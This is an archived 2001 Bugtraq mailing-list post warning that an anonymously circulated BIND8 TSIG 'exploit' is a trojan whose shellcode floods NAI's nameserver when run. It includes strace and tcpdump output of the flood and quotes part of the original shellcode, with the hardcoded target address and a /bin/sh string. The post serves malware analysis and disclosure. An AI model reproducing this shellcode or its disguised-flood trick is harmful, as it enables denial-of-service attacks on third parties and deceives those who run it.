[18923] in bugtraq
Re: That BIND8 "exploit" attacks NAI
daemon@ATHENA.MIT.EDU (Max Vision)
Thu Feb 1 13:33:42 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <5.0.2.1.2.20010131211836.02bd5218@127.0.0.01>
Date: Wed, 31 Jan 2001 21:33:53 -0800
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Here is more detailed information about the "trojan" bind8 exploit posted
to Bugtraq.
When you run the alleged tsig exploit it actually manages to run the Linux
shellcode on the local system (in my environment I used a Redhat 6.2
install in VMware (local network only)).
The exploit forks, sends something to your actual target (appears to be a
*nonworking* remote exploit for bind) and in the child process floods
dns1.nai.com without mercy:
...
fork() = 614
[pid 612] getpid() = 612
[pid 612] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 612] sendto(3,
"\2d\204\0\0\1\0\0\0\0\0\1\0\315\200\203\304\10=\4\0\30"..., 512, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("23.23.23.23")}}, 16) = 512
[pid 612] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
[pid 612] connect(4, {sin_family=AF_INET, sin_port=htons(31338),
sin_addr=inet_addr("23.23.23.23")}}, 16 <unfinished ...>
[pid 614] time(NULL) = 981004491
[pid 614] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
...
(lots more sendto()...)
This is how those flood packets look with tcpdump
x.x.x.x.4691 > 161.69.3.150.53: 12147 updateMA [14174a] [235q] [27153n]
[27138au] (1024)
There's lots of them. This is bad depending on your like/dislike of NAI
and and/or law enforcement.
Drop that code and step away from the Internet!
Max
>Date: Wed, 31 Jan 2001 20:57:54 -0800
>To: bugtraq@securityfocus.com
>From: Max Vision <vision@whitehats.com>
>Subject: That BIND8 "exploit" attacks NAI
>
>Hi,
>
>Please beware of running code such as this. It will do it's best to
>attack NAI's nameserver. It's a typical, though well disguised, shellcode
>trick.
>Look in the Linux shellcode:
>\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
>More details after I have a better look...
>Max
>
>At 04:12 PM 1/31/2001 -0700, you wrote:
>> >From Anonymous <nobody@replay.com> Wed Jan 31 18:06:24 2001
>>Date: Thu, 31 Jan 2001 18:06:19 -0400
>>From: Anonymous <nobody@replay.com>
>>To: BUGTRAQ@SECURITYFOCUS.COM
>>Subject: Bind8 exploit
>>Message-ID: <C5119AD12E92D311928E009027DE4CCA554903@replay.com>
>>Mime-Version: 1.0
>>Content-Type: text/plain; charset="us-ascii"
>>X-Mailer: Internet Mail Service (5.5.2650.21)
>>
>>
>>/*
>> * Implements TSIG buffer mismanagement overflow for incorrect
>> signatures. That
>> * one was really nice bug!
>> * Thanks NAI for nice bug!
>> */
>>
>>/* zeroes in all shellcodes are allowed - we encode them anyway.. */
>>char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
>> * bind to tcp port 31338. hey aleph1
>> * :) */
>>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
>>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
>>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
>>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
>>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
>>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
>>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
